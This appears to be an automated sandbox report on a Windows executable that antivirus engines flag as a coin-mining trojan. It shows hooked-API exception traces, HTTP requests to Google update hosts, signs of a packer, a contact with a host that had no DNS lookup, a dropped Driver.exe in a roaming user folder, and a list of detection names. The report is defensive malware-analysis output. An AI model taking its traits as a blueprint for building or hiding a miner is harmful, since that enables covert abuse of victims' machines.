__exception__ June 8, 2021, 12:21 p.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x77210895 stacktrace+0x84 memdup-0x1af @ 0x72e10470 hook_in_monitor+0x45 lde-0x133 @ 0x72e042ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x72e23603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd6e3243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd6e31fb driver+0x53a27b @ 0x93a27b GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0x83cfff @ 0xc3cfff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0xc3e000 @ 0x103e000 driver+0x1000 @ 0x401000 driver+0x833d42 @ 0xc33d42 0x7fffffd3000 driver+0xc3f2ca @ 0x103f2ca 0x7fffffd3000 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x77210895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 2291256 registers.rsi: 17031168 registers.r10: 0 registers.rbx: 1994665712 registers.rsp: 2293576 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 2292600 registers.r12: 0 registers.rbp: 0 registers.rdi: 4194671 registers.rax: 2290936 registers.r13: 0	1
__exception__ June 8, 2021, 12:21 p.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x77210895 stacktrace+0x84 memdup-0x1af @ 0x72e10470 hook_in_monitor+0x45 lde-0x133 @ 0x72e042ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x72e23603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd6e3243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd6e31fb driver+0x53a27b @ 0x93a27b GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0x83cfff @ 0xc3cfff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0xc3e000 @ 0x103e000 driver+0x1000 @ 0x401000 driver+0x833d42 @ 0xc33d42 0x7fffffd6000 driver+0xc3f2ca @ 0x103f2ca 0x7fffffd6000 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x77210895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 2291256 registers.rsi: 17031168 registers.r10: 0 registers.rbx: 1994665712 registers.rsp: 2293576 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 2292600 registers.r12: 0 registers.rbp: 0 registers.rdi: 4194671 registers.rax: 2290936 registers.r13: 0	1
__exception__ June 8, 2021, 12:21 p.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x77210895 stacktrace+0x84 memdup-0x1af @ 0x72e10470 hook_in_monitor+0x45 lde-0x133 @ 0x72e042ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x72e23603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd6e3243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd6e31fb driver+0x53a27b @ 0x93a27b GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0x83cfff @ 0xc3cfff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0xc3e000 @ 0x103e000 driver+0x1000 @ 0x401000 driver+0x833d42 @ 0xc33d42 0x7fffffdf000 driver+0xc3f2ca @ 0x103f2ca 0x7fffffdf000 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x77210895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 2291256 registers.rsi: 17031168 registers.r10: 0 registers.rbx: 1994665712 registers.rsp: 2293576 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 2292600 registers.r12: 0 registers.rbp: 0 registers.rdi: 4194671 registers.rax: 2290936 registers.r13: 0	1
__exception__ June 8, 2021, 12:21 p.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x77210895 stacktrace+0x84 memdup-0x1af @ 0x72e10470 hook_in_monitor+0x45 lde-0x133 @ 0x72e042ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x72e23603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd6e3243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd6e31fb driver+0x53a27b @ 0x93a27b GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0x83cfff @ 0xc3cfff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0xc3e000 @ 0x103e000 driver+0x1000 @ 0x401000 driver+0x833d42 @ 0xc33d42 0x7fffffda000 driver+0xc3f2ca @ 0x103f2ca 0x7fffffda000 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x77210895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 2291256 registers.rsi: 17031168 registers.r10: 0 registers.rbx: 1994665712 registers.rsp: 2293576 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 2292600 registers.r12: 0 registers.rbp: 0 registers.rdi: 4194671 registers.rax: 2290936 registers.r13: 0	1
__exception__ June 8, 2021, 12:21 p.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x77210895 stacktrace+0x84 memdup-0x1af @ 0x72e10470 hook_in_monitor+0x45 lde-0x133 @ 0x72e042ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x72e23603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd6e3243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd6e31fb driver+0x53a27b @ 0x93a27b GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0x83cfff @ 0xc3cfff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0xc3e000 @ 0x103e000 driver+0x1000 @ 0x401000 driver+0x833d42 @ 0xc33d42 0x7fffffdf000 driver+0xc3f2ca @ 0x103f2ca 0x7fffffdf000 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x77210895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 2291256 registers.rsi: 17031168 registers.r10: 0 registers.rbx: 1994665712 registers.rsp: 2293576 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 2292600 registers.r12: 0 registers.rbp: 0 registers.rdi: 4194671 registers.rax: 2290936 registers.r13: 0	1
__exception__ June 8, 2021, 12:21 p.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x77210895 stacktrace+0x84 memdup-0x1af @ 0x72e10470 hook_in_monitor+0x45 lde-0x133 @ 0x72e042ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x72e23603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd6e3243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd6e31fb driver+0x53a27b @ 0x93a27b GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0x83cfff @ 0xc3cfff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0xc3e000 @ 0x103e000 driver+0x1000 @ 0x401000 driver+0x833d42 @ 0xc33d42 0x7fffffdb000 driver+0xc3f2ca @ 0x103f2ca 0x7fffffdb000 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x77210895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 2291256 registers.rsi: 17031168 registers.r10: 0 registers.rbx: 1994665712 registers.rsp: 2293576 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 2292600 registers.r12: 0 registers.rbp: 0 registers.rdi: 4194671 registers.rax: 2290936 registers.r13: 0	1
__exception__ June 8, 2021, 12:21 p.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x77210895 stacktrace+0x84 memdup-0x1af @ 0x72e10470 hook_in_monitor+0x45 lde-0x133 @ 0x72e042ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x72e23603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd6e3243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd6e31fb driver+0x53a27b @ 0x93a27b GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0x83cfff @ 0xc3cfff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0xc3e000 @ 0x103e000 driver+0x1000 @ 0x401000 driver+0x833d42 @ 0xc33d42 0x7fffffdf000 driver+0xc3f2ca @ 0x103f2ca 0x7fffffdf000 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x77210895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 2291256 registers.rsi: 17031168 registers.r10: 0 registers.rbx: 1994665712 registers.rsp: 2293576 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 2292600 registers.r12: 0 registers.rbp: 0 registers.rdi: 4194671 registers.rax: 2290936 registers.r13: 0	1
__exception__ June 8, 2021, 12:21 p.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x77210895 stacktrace+0x84 memdup-0x1af @ 0x72e10470 hook_in_monitor+0x45 lde-0x133 @ 0x72e042ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x72e23603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd6e3243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd6e31fb driver+0x53a27b @ 0x93a27b GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0x83cfff @ 0xc3cfff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0xc3e000 @ 0x103e000 driver+0x1000 @ 0x401000 driver+0x833d42 @ 0xc33d42 0x7fffffdb000 driver+0xc3f2ca @ 0x103f2ca 0x7fffffdb000 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x77210895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 2291256 registers.rsi: 17031168 registers.r10: 0 registers.rbx: 1994665712 registers.rsp: 2293576 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 2292600 registers.r12: 0 registers.rbp: 0 registers.rdi: 4194671 registers.rax: 2290936 registers.r13: 0	1
__exception__ June 8, 2021, 12:22 p.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x77210895 stacktrace+0x84 memdup-0x1af @ 0x72e10470 hook_in_monitor+0x45 lde-0x133 @ 0x72e042ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x72e23603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd6e3243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd6e31fb driver+0x53a27b @ 0x93a27b GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0x83cfff @ 0xc3cfff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0xc3e000 @ 0x103e000 driver+0x1000 @ 0x401000 driver+0x833d42 @ 0xc33d42 0x7fffffd4000 driver+0xc3f2ca @ 0x103f2ca 0x7fffffd4000 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x77210895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 2291256 registers.rsi: 17031168 registers.r10: 0 registers.rbx: 1994665712 registers.rsp: 2293576 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 2292600 registers.r12: 0 registers.rbp: 0 registers.rdi: 4194671 registers.rax: 2290936 registers.r13: 0	1
__exception__ June 8, 2021, 12:22 p.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x77210895 stacktrace+0x84 memdup-0x1af @ 0x72e10470 hook_in_monitor+0x45 lde-0x133 @ 0x72e042ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x72e23603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd6e3243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd6e31fb driver+0x53a27b @ 0x93a27b GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0x83cfff @ 0xc3cfff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0xc3e000 @ 0x103e000 driver+0x1000 @ 0x401000 driver+0x833d42 @ 0xc33d42 0x7fffffdc000 driver+0xc3f2ca @ 0x103f2ca 0x7fffffdc000 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x77210895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 2291256 registers.rsi: 17031168 registers.r10: 0 registers.rbx: 1994665712 registers.rsp: 2293576 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 2292600 registers.r12: 0 registers.rbp: 0 registers.rdi: 4194671 registers.rax: 2290936 registers.r13: 0	1
__exception__ June 8, 2021, 12:22 p.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x77210895 stacktrace+0x84 memdup-0x1af @ 0x72e10470 hook_in_monitor+0x45 lde-0x133 @ 0x72e042ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x72e23603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd6e3243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd6e31fb driver+0x53a27b @ 0x93a27b GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0x83cfff @ 0xc3cfff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0xc3e000 @ 0x103e000 driver+0x1000 @ 0x401000 driver+0x833d42 @ 0xc33d42 0x7fffffd3000 driver+0xc3f2ca @ 0x103f2ca 0x7fffffd3000 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x77210895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 2291256 registers.rsi: 17031168 registers.r10: 0 registers.rbx: 1994665712 registers.rsp: 2293576 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 2292600 registers.r12: 0 registers.rbp: 0 registers.rdi: 4194671 registers.rax: 2290936 registers.r13: 0	1
__exception__ June 8, 2021, 12:22 p.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x77210895 stacktrace+0x84 memdup-0x1af @ 0x72e10470 hook_in_monitor+0x45 lde-0x133 @ 0x72e042ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x72e23603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd6e3243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd6e31fb driver+0x53a27b @ 0x93a27b GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0x83cfff @ 0xc3cfff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0xc3e000 @ 0x103e000 driver+0x1000 @ 0x401000 driver+0x833d42 @ 0xc33d42 0x7fffffdc000 driver+0xc3f2ca @ 0x103f2ca 0x7fffffdc000 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x77210895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 2291256 registers.rsi: 17031168 registers.r10: 0 registers.rbx: 1994665712 registers.rsp: 2293576 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 2292600 registers.r12: 0 registers.rbp: 0 registers.rdi: 4194671 registers.rax: 2290936 registers.r13: 0	1
__exception__ June 8, 2021, 12:22 p.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x77210895 stacktrace+0x84 memdup-0x1af @ 0x72e10470 hook_in_monitor+0x45 lde-0x133 @ 0x72e042ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x72e23603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd6e3243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd6e31fb driver+0x53a27b @ 0x93a27b GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0x83cfff @ 0xc3cfff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0xc3e000 @ 0x103e000 driver+0x1000 @ 0x401000 driver+0x833d42 @ 0xc33d42 0x7fffffd4000 driver+0xc3f2ca @ 0x103f2ca 0x7fffffd4000 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x77210895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 2291256 registers.rsi: 17031168 registers.r10: 0 registers.rbx: 1994665712 registers.rsp: 2293576 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 2292600 registers.r12: 0 registers.rbp: 0 registers.rdi: 4194671 registers.rax: 2290936 registers.r13: 0	1

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

POST method with no referer header

suspicious_request

POST https://update.googleapis.com/service/update2?cup2key=10:3189767490&cup2hreq=57f661d37afb22c56bf47ced629abfdebff1d4d9a92840700f3ad3b5f2072610

Performs some HTTP requests (3 events)

request	HEAD http://edgedl.me.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe
request	GET http://edgedl.me.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe
request	POST https://update.googleapis.com/service/update2?cup2key=10:3189767490&cup2hreq=57f661d37afb22c56bf47ced629abfdebff1d4d9a92840700f3ad3b5f2072610

Sends data using the HTTP POST Method (1 event)

request

POST https://update.googleapis.com/service/update2?cup2key=10:3189767490&cup2hreq=57f661d37afb22c56bf47ced629abfdebff1d4d9a92840700f3ad3b5f2072610

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00458c00', u'virtual_address': u'0x00002000', u'entropy': 7.96250708775657, u'name': u'.text', u'virtual_size': u'0x00458ac4'}

entropy

7.96250708776

description

A section with a high entropy has been found

entropy

0.999550864586

description

Overall entropy of this PE file is high

Communicates with host for which no DNS query was performed (1 event)

host

172.217.25.14

Creates an executable file in a user folder (1 event)

file	C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe

File has been identified by 49 AntiVirus engines on VirusTotal as malicious (49 events)

Elastic	malicious (high confidence)
DrWeb	Trojan.DownLoader32.48498
MicroWorld-eScan	Gen:Variant.Mino.1
FireEye	Generic.mg.e8a064a89592dd08
CAT-QuickHeal	Trojan.MsilFC.S11355404
McAfee	GenericRXOG-AG!E8A064A89592
Cylance	Unsafe
Zillya	Trojan.CoinMiner.Win32.31899
Sangfor	Trojan.Win32.Save.a
K7AntiVirus	Trojan ( 00517fbc1 )
Alibaba	Trojan:Win32/CoinMiner.ali1002002
K7GW	Trojan ( 00517fbc1 )
Cybereason	malicious.89592d
BitDefenderTheta	Gen:NN.ZemsilF.34722.@p0@aq!Pggk
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of MSIL/CoinMiner.ACZ
APEX	Malicious
Avast	Win64:Malware-gen
Kaspersky	Trojan.Win32.Miner.atfuq
BitDefender	Gen:Variant.Mino.1
Paloalto	generic.ml
AegisLab	Trojan.Win32.Miner.4!c
Tencent	Win32.Trojan.Miner.Ambw
Ad-Aware	Gen:Variant.Mino.1
Emsisoft	Gen:Variant.Mino.1 (B)
McAfee-GW-Edition	BehavesLike.Win32.Generic.rc
Sophos	Mal/Miner-J
Ikarus	Trojan.MSIL.CoinMiner
Jiangmin	TrojanDropper.MSIL.azry
eGambit	Unsafe.AI_Score_99%
Avira	TR/ATRAPS.Gen
Microsoft	Trojan:MSIL/CoinMiner.ADA!MTB
Gridinsoft	Trojan.Win32.Gen.sd!n
Arcabit	IL:Trojan.MSILZilla.D652
GData	Gen:Variant.Mino.1
Cynet	Malicious (score: 100)
AhnLab-V3	Trojan/Win32.CoinMiner.R338384
VBA32	Trojan.Miner
ALYac	IL:Trojan.MSILZilla.1618
MAX	malware (ai score=86)
Malwarebytes	Trojan.Crypt.Generic
Yandex	Trojan.CoinMiner!7pS3G1I96SQ
SentinelOne	Static AI - Malicious PE
MaxSecure	Trojan.Malware.11234915.susgen
Fortinet	MSIL/Generic.AP.12C58B6!tr
Webroot	TrojanSpy:MSIL/VB.A
AVG	Win64:Malware-gen
Panda	Trj/GdSda.A
CrowdStrike	win/malicious_confidence_100% (W)

file8.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All